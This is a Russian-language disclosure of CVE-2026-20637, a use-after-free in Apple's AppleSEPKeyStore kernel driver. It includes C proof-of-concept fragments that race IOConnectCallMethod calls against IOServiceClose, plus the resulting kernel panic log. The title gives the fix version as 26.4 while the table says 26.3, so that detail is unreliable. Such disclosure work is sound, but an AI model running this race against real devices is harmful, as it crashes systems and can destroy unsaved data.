
CVE-2026-20637: использование после освобождения в AppleSEPKeyStore — уязвимость ядра iOS/macOS (исправлена в 26.4)
CVE-2026-20637 | Автор: Johnny Franks (@zeroxjf)
Компонент: AppleKeyStore
Воздействие: Приложение может вызвать непредвиденное завершение работы системы
Описание: Проблема использования после освобождения была устранена с помощью улучшенного управления памятью.
| iOS | 26.1 - 26.2 (протестировано) |
| macOS | 26.1 - 26.2 (протестировано) |
| Компонент | com.apple.driver.AppleSEPKeyStore |
| Исправлено | iOS 26.3 / iPadOS 26.3 |
Примечание: Apple могла исправлять эту уязвимость постепенно, между версиями 26.2.1 и 26.3, поэтому на промежуточных версиях она может не сработать.
Этот PoC немедленно вызывает панику ядра на затронутых устройствах. Сохраните работу перед запуском; повторные принудительные паники могут повредить несохранённые данные.
Использование после освобождения в IOCommandGate, вызванное гонкой открытия/закрытия AppleKeyStore. Восемь потоков-вызывающих интенсивно обращаются к IOConnectCallMethod с селекторами 0–15, в то время как четыре потока-закрывающих участвуют в гонке с IOServiceClose, создавая окно, в котором доступ к командному шлюзу осуществляется после освобождения.
#define AKS_SERVICE_NAME "AppleKeyStore"
#define NUM_CALLERS 8
#define NUM_CLOSERS 4
#define NUM_ITERATIONS 100000
static _Atomic(io_connect_t) g_conn = IO_OBJECT_NULL;
// 8 caller threads: hammer IOConnectCallMethod (high priority)
while (!done) {
io_connect_t conn = atomic_load(&g_conn);
if (conn == IO_OBJECT_NULL) continue;
for (uint32_t sel = 0; sel < 16; sel++) {
IOConnectCallMethod(conn, sel, scalars, 6, NULL, 0, NULL, NULL, NULL, NULL);
}
}
// 4 closer threads: race IOServiceClose (high priority)
while (!done) {
io_connect_t conn = atomic_load(&g_conn);
if (conn == IO_OBJECT_NULL) continue;
IOServiceClose(conn);
atomic_store(&g_conn, IO_OBJECT_NULL);
}
// Main thread: 100k connections, no delay
for (int i = 0; i < NUM_ITERATIONS; i++) {
uint32_t type = (i % 4 == 0) ? 0x2022 : (i % 4 == 1) ? 0xbeef : (i % 4 == 2) ? 0x1337 : 0x4141;
IOServiceOpen(svc, mach_task_self(), type, &conn);
atomic_store(&g_conn, conn);
// no delay: keep the close/call race window hot
}
panic(cpu 4 caller 0xfffffff015b84ae0): [iokit.IOCommandGate]: element modified after free
(off:72, val:0xfffffffffffffe00, sz:80, ptr:0xffffffe69b7d0db0)
72: 0xfffffffffffffe00
Kernel version: Darwin Kernel Version 25.1.0: Thu Oct 23 11:09:22 PDT 2025;
root:xnu-12377.42.6~55/RELEASE_ARM64_T8030
Panicked task 0xffffffe5b4f1e820: pid 956: Test
Kernel Extensions in backtrace:
com.apple.driver.AppleSEPKeyStore(2.0)[AD3CDADB-06B6-32F5-9E47-9889901353CA]
@0xfffffff016a47020->0xfffffff016a84f9f